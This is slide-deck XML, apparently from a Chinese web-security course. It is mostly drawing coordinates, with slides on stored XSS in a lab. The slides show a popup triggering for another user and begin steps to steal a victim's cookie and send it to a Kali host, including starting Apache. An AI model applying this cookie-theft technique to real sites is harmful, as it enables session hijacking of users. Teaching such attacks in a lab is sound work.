                  <a:pt x="615879" y="224861"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="642125" y="260123"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="665782" y="297306"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="686718" y="336278"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="704799" y="376906"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="719891" y="419054"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="731862" y="462592"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="740578" y="507384"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="745906" y="553299"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="747711" y="600201"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="747711" y="348615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8" name="Freeform 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="5567426"/>
            <a:ext cx="938530" cy="790575"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="938530" h="790575">
                <a:moveTo>
                  <a:pt x="938211" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="936768" y="48153"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="932495" y="95543"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="925474" y="142088"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="915788" y="187705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="903519" y="232312"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="888751" y="275825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="871566" y="318161"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="852046" y="359239"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="830275" y="398975"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="806335" y="437286"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="780309" y="474091"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="752279" y="509306"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="722328" y="542848"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="690539" y="574635"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="656995" y="604584"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="621778" y="632613"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="584971" y="658638"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="546656" y="682577"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="506917" y="704348"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="465835" y="723867"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="423495" y="741052"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="379977" y="755820"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="335366" y="768088"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="289744" y="777774"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="243193" y="784795"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="195796" y="789068"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="147636" y="790511"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="99476" y="789068"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="52079" y="784795"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5528" y="777774"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="776600"/>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9" name="Freeform 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1766823"/>
            <a:ext cx="938530" cy="3801110"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="938530" h="3801110">
                <a:moveTo>
                  <a:pt x="0" y="13911"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5532" y="12737"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="52082" y="5716"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="99477" y="1442"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="147636" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="195796" y="1569"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="243193" y="5843"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="289744" y="12864"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="335366" y="22550"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="379977" y="34818"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="423495" y="49586"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="465835" y="66772"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="506917" y="86291"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="546656" y="108062"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="584971" y="132002"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="621778" y="158029"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="656995" y="186059"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="690539" y="216009"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="722328" y="247798"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="752279" y="281343"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="780309" y="316560"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="806335" y="353367"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="830275" y="391682"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="852046" y="431421"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="871566" y="472502"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="888751" y="514843"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="903519" y="558360"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="915788" y="602971"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="925474" y="648594"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="932495" y="695145"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="936768" y="742542"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="938211" y="790701"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="938211" y="380060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0" name="Freeform 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="5624512"/>
            <a:ext cx="1129030" cy="981075"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1129030" h="981075">
                <a:moveTo>
                  <a:pt x="1128711" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1127580" y="47533"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1124220" y="94484"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1118683" y="140798"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1111021" y="186427"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1101284" y="231317"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1089525" y="275417"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1075794" y="318677"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1060143" y="361045"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1042623" y="402469"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1023286" y="442898"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1002183" y="482281"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="979366" y="520566"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="954886" y="557701"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="928794" y="593636"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="901141" y="628319"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="871980" y="661699"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="841361" y="693724"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="809336" y="724343"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="775956" y="753505"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="741273" y="781157"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="705338" y="807249"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="668202" y="831730"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="629917" y="854547"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="590535" y="875650"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="550106" y="894987"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="508682" y="912506"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="466314" y="928157"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="423054" y="941888"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="378953" y="953648"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="334063" y="963384"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="288435" y="971047"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="242120" y="976583"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="195170" y="979943"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="147636" y="981075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="100102" y="979943"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53152" y="976583"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6837" y="971047"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="96989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1" name="Freeform 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1509649"/>
            <a:ext cx="1129030" cy="4115435"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1129030" h="4115435">
                <a:moveTo>
                  <a:pt x="0" y="11177"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6837" y="10028"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53152" y="4491"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="100102" y="1131"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="147636" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="195170" y="1131"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="242120" y="4491"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="288435" y="10028"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="334063" y="17692"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="378953" y="27429"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="423054" y="39190"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="466314" y="52922"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="508682" y="68574"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="550106" y="86095"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="590535" y="105434"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="629917" y="126538"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="668202" y="149357"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="705338" y="173839"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="741273" y="199932"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="775956" y="227586"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="809336" y="256749"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="841361" y="287369"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="871980" y="319395"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="901141" y="352776"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="928794" y="387459"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="954886" y="423395"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="979366" y="460531"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1002183" y="498816"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1023286" y="538198"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1042623" y="578627"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1060143" y="620050"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1075794" y="662416"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1089525" y="705675"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1101284" y="749774"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1111021" y="794661"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1118683" y="840287"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1124220" y="886598"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1127580" y="933545"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1128711" y="981075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1128711" y="4114863"/>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2" name="Freeform 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4914900"/>
            <a:ext cx="2038350" cy="1762125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2038350" h="1762125">
                <a:moveTo>
                  <a:pt x="0" y="1762125"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2038350" y="1762125"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2038350" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1762125"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF">
              <a:alpha val="100000"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" rtlCol="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1100"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="AutoShape 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1819275" y="61817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4" name="AutoShape 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1819275" y="66770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5" name="AutoShape 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1819275" y="6343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6" name="Freeform 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1819275" y="6515100"/>
            <a:ext cx="66675" cy="57150"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="66675" h="57150">
                <a:moveTo>
                  <a:pt x="33274" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="20359" y="2244"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9779"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AutoShape 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="157162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8" name="AutoShape 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="157162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157162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0" name="Freeform 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="157162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1" name="AutoShape 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="132397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2" name="AutoShape 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="132397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132397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4" name="Freeform 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="132397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5" name="AutoShape 35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10858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6" name="AutoShape 36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10858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7" name="AutoShape 37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10858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8" name="Freeform 38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10858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9" name="AutoShape 39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8763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0" name="AutoShape 40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8763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1" name="AutoShape 41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8763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2" name="Freeform 42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8763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3" name="AutoShape 43"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6286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4" name="AutoShape 44"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6286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5" name="AutoShape 45"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6286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6" name="Freeform 46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6286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7" name="AutoShape 47"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3810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8" name="AutoShape 48"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3810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9" name="AutoShape 49"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3810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0" name="Freeform 50"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3810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1" name="AutoShape 51"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="142875"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2" name="AutoShape 52"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="142875"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3" name="AutoShape 53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="142875"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4" name="Freeform 54"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="142875"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5" name="TextBox 55"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3733800" y="3123945"/>
            <a:ext cx="5697855" cy="1029335"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="14002" rIns="0" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="dist">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="110"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <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rPr>
              <a:t>项目导入</a:t>
            </a:r>
            <a:endPar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56" name="Freeform 56"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5715000" y="2581275"/>
            <a:ext cx="762000" cy="85725"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="762000" h="85725">
                <a:moveTo>
                  <a:pt x="719074" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="42799" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26146" y="3367"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12541" y="12557"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3365" y="26199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="42925"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3365" y="59578"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12541" y="73183"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26146" y="82359"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="42799" y="85725"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="719074" y="85725"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="735800" y="82359"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="749442" y="73183"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="758632" y="59578"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="762000" y="42925"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="758632" y="26199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="749442" y="12557"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="735800" y="3367"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="719074"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57" name="TextBox 57"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5124195" y="1904999"/>
            <a:ext cx="1943608" cy="575310"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="13335" rIns="0" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="105"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <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rPr>
              <a:t>PART02</a:t>
            </a:r>
            <a:endPar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58" name="AutoShape 58"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9001125" y="257175"/>
            <a:ext cx="2905125" cy="42862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5" name="文本框 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990600" y="1541780"/>
            <a:ext cx="10763250" cy="1014730"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>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使用另一个浏览器登录user用户，一旦点击到XSS stored后，就会弹出窗口，这样的攻击方式，简单高效，不必通过一些社工诱导用户点击某个链接，而是直接中招。结果如图10-21所示。</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1600200" y="493395"/>
            <a:ext cx="5483860" cy="878205"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16478" rIns="0" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="130"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" alt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存储型XSS</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" alt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1600200" y="1143000"/>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1.低安全级别</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pic>
        <p:nvPicPr>
          <p:cNvPr id="26" name="图片 21"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3048000" y="2514600"/>
            <a:ext cx="6417945" cy="3977640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="6553200"/>
            <a:ext cx="6096000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>图10-21 XSS存储型执行结果图</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>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5" name="文本框 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="1541780"/>
            <a:ext cx="10398760" cy="5169535"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>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下面将通过注入XSS漏洞获取受害主机的cookie，并将其发送到一个主机上，如Kali主机，具体详细步骤如下：</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>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第一步：在 Kali打开 http服务，创建用于存放cookie的文件。</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>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root@Kali:~# systemctl start apache2</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
